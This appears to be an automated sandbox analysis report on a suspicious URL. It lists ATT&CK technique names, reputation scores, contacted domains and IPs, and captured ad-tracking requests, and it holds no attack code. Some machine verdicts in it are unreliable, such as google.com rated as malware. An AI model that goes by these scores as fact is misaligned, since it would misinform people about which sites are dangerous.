ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A1%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
https://www.redditstatic.com/ads/pixel.js0%URL Reputationsafe
https://ep2.adtrafficquality.google0%URL Reputationsafe
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://s.adroll.com0%URL Reputationsafe
http://ns.attribution.com/ads/1.0/0%URL Reputationsafe
https://stats.g.doubleclick.net/j/collect0%URL Reputationsafe
https://cdn.ampproject.org/amp4ads-host-v0.js0%URL Reputationsafe
https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=2320%URL Reputationsafe
http://mathiasbynens.be/0%URL Reputationsafe
https://connect.facebook.net/0%URL Reputationsafe
http://google.com100%URL Reputationmalware
http://daneden.me/animate0%URL Reputationsafe
http://kenwheeler.github.io/slick0%URL Reputationsafe
https://www.blogger.com0%VirustotalBrowse
https://js.usemessages.com/conversations-embed.js0%VirustotalBrowse
https://googleads.g.doubleclick.net/pagead/html/r20241009/r20190131/zrt_lookup_fy2021.html0%VirustotalBrowse
https://pd.sharethis.com/pd/dtscout0%VirustotalBrowse
https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-success&value=10%VirustotalBrowse
https://us-u.openx.net/w/1.0/cm?cc=1&id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.129.229
truefalse
    unknown
    pacman-content-live.live.eks.hotjar.com
    54.171.225.199
    truefalse
      unknown
      forms.hubspot.com
      104.16.118.116
      truefalse
        unknown
        chaeynore.com
        23.109.170.65
        truefalse
          unknown
          cs837.wac.edgecastcdn.net
          192.229.133.221
          truefalse
            unknown
            2500081.fs1.hubspotusercontent-na1.net
            104.18.41.124
            truefalse
              unknown
              cta-service-cms2.hubspot.com
              104.16.118.116
              truefalse
                unknown
                eu-eb2.3lift.com
                76.223.111.18
                truefalse
                  unknown
                  adserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.com
                  108.128.74.13
                  truefalse
                    unknown
                    stats.g.doubleclick.net
                    108.177.15.155
                    truefalse
                      unknown
                      httplogserver-lb.global.unified-prod.sharethis.net
                      18.195.70.100
                      truefalse
                        unknown
                        track.hubspot.com
                        104.16.118.116
                        truefalse
                          unknown
                          forms.hscollectedforms.net
                          104.16.107.254
                          truefalse
                            unknown
                            ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud
                            3.75.62.37
                            truefalse
                              unknown
                              s4.histats.com
                              149.56.240.127
                              truefalse
                                unknown
                                cdnjs.cloudflare.com
                                104.17.24.14
                                truefalse
                                  unknown
                                  js.hs-scripts.com
                                  104.16.141.209
                                  truefalse
                                    unknown
                                    cm.g.doubleclick.net
                                    216.58.206.34
                                    truefalse
                                      unknown
                                      www.google.com
                                      142.250.185.100
                                      truefalse
                                        unknown
                                        js.usemessages.com
                                        104.16.78.142
                                        truefalse
                                          unknown
                                          ald.my.id
                                          198.252.106.147
                                          truefalse
                                            unknown
                                            bcp.crwdcntrl.net
                                            54.77.205.105
                                            truefalse
                                              unknown
                                              match.adsrvr.org
                                              3.33.220.150
                                              truefalse
                                                unknown
                                                static-cdn.hotjar.com
                                                18.66.102.106
                                                truefalse
                                                  unknown
                                                  js.hs-banner.com
                                                  172.64.147.16
                                                  truefalse
                                                    unknown
                                                    star-mini.c10r.facebook.com
                                                    157.240.253.35
                                                    truefalse
                                                      unknown
                                                      us-u.openx.net
                                                      34.98.64.218
                                                      truefalse
                                                        unknown
                                                        d1qug1xf2dk5z6.cloudfront.net
                                                        18.245.86.116
                                                        truefalse
                                                          unknown
                                                          nydc1.outbrain.org
                                                          64.202.112.63
                                                          truefalse
                                                            unknown
                                                            7052064.fs1.hubspotusercontent-na1.net
                                                            104.18.41.124
                                                            truefalse
                                                              unknown
                                                              js.hsadspixel.net
                                                              104.17.223.152
                                                              truefalse
                                                                unknown
                                                                t.dtscout.com
                                                                141.101.120.10
                                                                truefalse
                                                                  unknown
                                                                  pixel.onaudience.com
                                                                  148.113.153.94
                                                                  truefalse
                                                                    unknown
                                                                    sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com
                                                                    54.72.14.45
                                                                    truefalse
                                                                      unknown
                                                                      pug-lhr-bc.pubmnet.com
                                                                      185.64.191.210
                                                                      truefalse
                                                                        unknown
                                                                        bg.microsoft.map.fastly.net
                                                                        199.232.214.172
                                                                        truefalse
                                                                          unknown
                                                                          dualstack.reddit.map.fastly.net
                                                                          151.101.129.140
                                                                          truefalse
                                                                            unknown
                                                                            youtube-ui.l.google.com
                                                                            216.58.206.78
                                                                            truefalse
                                                                              unknown
                                                                              googleads.g.doubleclick.net
                                                                              142.250.184.194
                                                                              truefalse
                                                                                unknown
                                                                                www3.l.google.com
                                                                                142.250.185.110
                                                                                truefalse
                                                                                  unknown
                                                                                  reddit.map.fastly.net
                                                                                  151.101.1.140
                                                                                  truefalse
                                                                                    unknown
                                                                                    api.hubapi.com
                                                                                    104.18.244.108
                                                                                    truefalse
                                                                                      unknown
                                                                                      td.doubleclick.net
                                                                                      142.250.185.162
                                                                                      truefalse
                                                                                        unknown
                                                                                        ml314.com
                                                                                        34.117.77.79
                                                                                        truefalse
                                                                                          unknown
                                                                                          settings.luckyorange.com
                                                                                          34.107.203.234
                                                                                          truefalse
                                                                                            unknown
                                                                                            googlehosted.l.googleusercontent.com
                                                                                            142.250.185.161
                                                                                            truefalse
                                                                                              unknown
                                                                                              wsky-live.live.eks.hotjar.com
                                                                                              99.80.69.237
                                                                                              truefalse
                                                                                                unknown
                                                                                                forms.hsforms.com
                                                                                                104.18.80.204
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  de.tynt.com
                                                                                                  67.202.105.31
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    js.hs-analytics.net
                                                                                                    104.16.160.168
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      user-data-eu.bidswitch.net
                                                                                                      35.214.136.108
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        adservice.google.com
                                                                                                        216.58.212.162
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          ps.eyeota.net
                                                                                                          3.120.214.218
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            idsync.rlcdn.com
                                                                                                            35.244.174.68
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              scontent.xx.fbcdn.net
                                                                                                              157.240.251.9
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                group7.sites.hscoscdn00.net
                                                                                                                199.60.103.30
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  script.hotjar.com
                                                                                                                  13.33.187.19
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    i.simpli.fi
                                                                                                                    35.204.89.238
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      am-vip001.taboola.com
                                                                                                                      141.226.228.48
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        pixel.tapad.com
                                                                                                                        34.111.113.62
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          pippio.com
                                                                                                                          107.178.254.65
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            static.hsappstatic.net
                                                                                                                            104.17.175.91
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              a.nel.cloudflare.com
                                                                                                                              35.190.80.1
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                app.hubspot.com
                                                                                                                                104.16.117.116
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  blogspot.l.googleusercontent.com
                                                                                                                                  142.250.185.97
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    js.hubspot.com
                                                                                                                                    104.16.117.116
                                                                                                                                    truefalse
                                                                                                                                      unknown
                                                                                                                                      rawgitcdn.b-cdn.net
                                                                                                                                      169.150.236.104
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        js.hsleadflows.net
                                                                                                                                        104.18.139.17
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          adserver-2084671375.us-east-1.elb.amazonaws.com
                                                                                                                                          52.202.213.18
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            tags.crwdcntrl.net
                                                                                                                                            65.9.66.122
                                                                                                                                            truefalse
                                                                                                                                              unknown
                                                                                                                                              forms-na1.hsforms.com
                                                                                                                                              104.19.175.188
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                dsum-sec.casalemedia.com
                                                                                                                                                104.18.36.155
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  thirdparty-logserver-lb.global.unified-prod.sharethis.net
                                                                                                                                                  52.59.151.85
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    t.dtscdn.com
                                                                                                                                                    104.26.12.60
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
                                                                                                                                                      e.dtscout.com
                                                                                                                                                      141.101.120.11
                                                                                                                                                      truefalse
                                                                                                                                                        unknown
                                                                                                                                                        pug-ams-bc.pubmnet.com
                                                                                                                                                        198.47.127.205
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          analytics.google.com
                                                                                                                                                          142.250.186.142
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            ic.tynt.com
                                                                                                                                                            67.202.105.33
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              rc-ext-geo.rlcdn.com
                                                                                                                                                              35.244.174.68
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                perf-na1.hsforms.com
                                                                                                                                                                104.19.175.188
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  ib.anycast.adnxs.com
                                                                                                                                                                  185.89.210.244
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    d20519brkbo4nz.cloudfront.net
                                                                                                                                                                    18.239.94.29
                                                                                                                                                                    truefalse
                                                                                                                                                                      unknown
                                                                                                                                                                      js.hscollectedforms.net
                                                                                                                                                                      104.16.107.254
                                                                                                                                                                      truefalse
                                                                                                                                                                        unknown
                                                                                                                                                                        alb.reddit.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          d.adroll.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            secure.adnxs.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              static.hotjar.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                www.youtube.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  ws.hotjar.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    www.redditstatic.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      pixel.rubiconproject.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        connect.facebook.net
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          px.ads.linkedin.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknownfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            get.managedmethods.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknownfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              x.adroll.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknownfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                p.jwalf.com
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknownfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  rc.rlcdn.com
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    tools.luckyorange.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      sync.sharethis.com
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        my7recovery.blogspot.com
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          https://get.managedmethods.com/cloud-application-security-checklistfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://x.adroll.com/pxl/iframe_content.html?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://get.managedmethods.com/hubfs/Background.svgfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://get.managedmethods.com/_hcms/perf/v2?viaBeacon=truefalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://www.redditstatic.com/ads/pixel.jsfalse
                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://alb.reddit.com/rp.gif?ts=1728903365250&id=a2_dy5o8mn2d6oc&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=631133ec-3227-461f-8a3a-bfa5fb517d3d&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc=false
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://d.adroll.com/cm/index/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://js.usemessages.com/conversations-embed.jsfalseunknown
                                                                                                                                                                                                                      https://idsync.rlcdn.com/362358.gif?google_gid=CAESEN8gEFx9cwtRY3EyfYfHFSQ&google_cver=1false
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://d.adroll.com/pixel/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&cookie=TSSSGOL6MBFETCAHMJBJCQ%3A1%7CI63T2M6SPVC5ROYHA7HR6W%3A1%7CJ5ZZRODTFVDKLJ2GKXKSSA%3A1&adroll_s_ref=https%3A//get.managedmethods.com/k12-cybersecurity-safety-k12dive%3Fgad_source%3D5&keyw=&p0=7596&xa4=1false
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://d.adroll.com/cm/b/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://ml314.com/utsync.ashx?eid=50131&et=13&cid=lr&fp=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&gdpr=0&gdpr_consent=&return=https%3A%2F%2Fidsync.rlcdn.com%2F395886.gif%3Fpartner_uid%3D%5BPersonID%5Dfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://fundingchoicesmessages.google.com/f/AGSKWxUmsMqtSSePcx4h11wfZV5rxyGVnJAk3oRbeOgKg7Io4obCBjjBWNKhsHkvPsx3lQdQWEDqC1eiMud2YT43HJ5HwRq_9qwIjdhbtz3yndJAe8FOk_FaXhRHtllCX0s7Nhk82CqRrQ==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTU3LDYyNjAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0false
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://x.adroll.com/attribution/trigger?fpc=378484b1f0e790975382e6fc128c23d2&advertisable_eid=TSSSGOL6MBFETCAHMJBJCQ&conversion_type=PageView&conversion_value=0.00&currency=USC&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5false
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://static.hotjar.com/c/hotjar-1110137.js?sv=6false
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/a2_dy5o8mn2d6oc_telemetryfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://get.managedmethods.com/hs/hsstatic/jquery-libs/static-1.1/jquery/jquery-1.7.1.jsfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://googleads.g.doubleclick.net/pagead/html/r20241009/r20190131/zrt_lookup_fy2021.htmlfalseunknown
                                                                                                                                                                                                                                        https://x.adroll.com/.well-known/attribution-reporting/debug/verbosefalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://get.managedmethods.com/_hcms/forms/embed/v3/form/6834707/b2b34cd6-93c2-44dd-9be1-38727a6852ef/json?hs_static_app=forms-embed&hs_static_app_version=1.6227&X-HubSpot-Static-App-Info=forms-embed-1.6227false
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://www.youtube.com/embed/t3Gl92wBomo?feature=oembedfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://track.hubspot.com/__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=44965294738&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&cpi=44965294738&lpi=44965294738&abi=44965294735&lvi=44965294738&lvc=en&r=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&pu=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&t=Cloud+App+Security+Checklist+%7C+Google+%26+Microsoft+365+Security&cts=1728903368157&vi=1ad7ee3b723d214336417ad5b634063c&nc=false&u=82022089.1ad7ee3b723d214336417ad5b634063c.1728897174105.1728897174105.1728897174105.1&b=82022089.2.1728897174106&pt=1&cc=15false
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://ald.my.id/false
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://fundingchoicesmessages.google.com/el/AGSKWxVZoYWlfdvwHBg7uZcv5GxnOgt9zM-aVFvVvpqOrXouyIjFS0uOWep_F_zzjDgtTLy6hZmKDJysA3bXlZb0BivSTVZipL6STbwGlaV4NIID61N6S8krYmd6cdOYhIiUXqj1mW9YSg==false
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://get.managedmethods.com/hubfs/Content%20Cloud%20App%20Security%20Checklist/HS%20Landing%20Page%20Preview%20-%20Cloud%20App%20Security%20Checklist%20(791%20x%20463%20px).pngfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://d.adroll.com/cm/g/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://ups.analytics.yahoo.com/ups/55980/sync?_origin=1&uid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=BOOla_OOOla_OA2ABBENAkwAAAAXyACAAyAIIAfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://pd.sharethis.com/pd/dtscoutfalseunknown
                                                                                                                                                                                                                                                          https://x.bidswitch.net/sync?dsp_id=44&user_id=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmIfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://de.tynt.com/deb/v2?id=wu!&dn=AFWU&cc=1&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117&r=https%3A%2F%2Fald.my.id%2F&pu=https%3A%2F%2Fald.my.id%2Ffalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://app.hubspot.com/content-tools-menu/api/v1/tools-menu/has-permission-json?portalId=6834707false
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://us-u.openx.net/w/1.0/cm?cc=1&id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3Dfalseunknown
                                                                                                                                                                                                                                                                https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-success&value=1falseunknown
                                                                                                                                                                                                                                                                https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=6834707&currentUrl=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&utk=1ad7ee3b723d214336417ad5b634063c&__hstc=82022089.1ad7ee3b723d214336417ad5b634063c.1728897174105.1728897174105.1728897174105.1&__hssc=82022089.1.1728897174106&referrer=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&contentId=44965294738false
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://d.adroll.com/cm/r/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=7d931d72-b6cd-40d8-9aaa-91033ac03d95&ttd_puid=e3913225-94b4-4b08-9fd3-4285fd980084%2C%2Cfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://sync.sharethis.com/eyeota?uid=2vSdg0G_wj1oSR5uhhmamgKTQUQPGWo6UXUC2ilh8T3A&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        https://ald.my.id/favicon.icofalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          https://s.adroll.com/j/pre/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W/fpconsent.jsfalse
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            http://p.jwalf.com/ad/ad?p=198473&w=638192&d=7930e1d26d7336e03d98-1635872656638192&s=212257false
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              https://d.adroll.com/cm/n/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                https://x.adroll.com/attribution/trigger?fpc=378484b1f0e790975382e6fc128c23d2&advertisable_eid=TSSSGOL6MBFETCAHMJBJCQ&conversion_type=PageView&conversion_value=0.00&currency=USC&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklistfalse
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  https://fundingchoicesmessages.google.com/i/ca-pub-2542884292174911?href=https%3A%2F%2Fald.my.id&ers=2false
                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                    https://forms-na1.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-RENDER_SUCCESS&count=1false
                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                      https://cm.g.doubleclick.net/pixel?google_nid=epsilon&google_cmfalse
                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                        https://t.dtscout.com/idg/?su=1040172889715587758A2B28B3F6BBD2false
                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                          https://x.adroll.com/igs?advertisable=TSSSGOL6MBFETCAHMJBJCQ&fpc=378484b1f0e790975382e6fc128c23d2false
                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                            https://pixel.tapad.com/idsync/ex/receive?partner_id=APPNEXUS&partner_device_id=4305931231207897773&pt=e3913225-94b4-4b08-9fd3-4285fd980084%2C%2Cfalse
                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                              https://d.adroll.com/cm/b/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                                                                                                unknown
